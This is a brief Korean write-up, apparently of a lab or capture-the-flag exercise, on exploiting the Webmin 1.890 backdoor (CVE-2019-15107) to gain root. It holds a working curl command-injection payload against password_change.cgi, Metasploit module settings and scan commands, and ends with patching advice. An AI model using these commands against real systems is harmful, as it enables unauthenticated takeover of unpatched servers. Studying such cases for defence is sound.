
연구 목표: Webmin 버전 1.890(CVE-2019-15107)의 원격 코드 실행(RCE) 취약점에 대한 종합적인 분석 및 성공적인 악용을 수행하여 궁극적으로 대상 시스템에 대한 완전한 제어 권한을 획득하는 것.
연구 목표: Webmin 1.890 버전의 원격 코드 실행(RCE) 취약점(CVE-2019-15107)에 대한 포괄적인 분석 및 성공적인 익스플로잇을 수행하여, 최종적으로 대상 시스템에 대한 완전한 제어권을 획득하는 것.
방법론:
초기 정찰:
Nmap을 사용한 네트워크 스캔 수행:
bash nmap -sV -sC -A -p- 10.201.105.185 포트 10000에서 실행 중인 Webmin 1.890 서비스 식별
취약점 분석:
password_change.cgi의 취약점 메커니즘 조사
인증 없이 임의 명령어 실행 가능성 확인
익스플로잇:
두 가지 공격 벡터 구현:
Metasploit 프레임워크 사용:
bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit curl을 통한 수동 익스플로잇:
bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" 사후 익스플로잇:
대화형 루트 셸 획득
파일 시스템 분석 수행
플래그 파일 발견:
bash /home/dark/user.txt /root/root.txt 결과:
CVE-2019-15107 취약점 성공적으로 익스플로잇
시스템에서 완전한 루트 권한 획득
적시 소프트웨어 업데이트의 중요성 입증
기술적 결론:
"old" 매개변수 주입을 통한 임의 명령어 실행 허용
인증 검사 부재로 인해 특히 위험
버전 1.890에는 이후 릴리스에서 패치된 백도어 포함
보안 권장 사항:
현재 Webmin 버전으로 즉시 업그레이드
IP별 관리 패널 접근 제한
웹 애플리케이션 정기적인 보안 감사
추가 연구 방향:
기타 Webmin 취약점 분석
Metasploit 없이 사용자 정의 익스플로잇 개발
침해 시스템에서의 지속 기술 조사
본 사례 연구는 배포된 소프트웨어에서 적시 시스템 업데이트의 중요성과 지속적인 취약점 모니터링의 필요성을 입증합니다. 이 연구는 기본적인 보안 원칙을 강조하면서 현대 웹 애플리케이션 익스플로잇 기술에 대한 실용적인 통찰력을 제공합니다.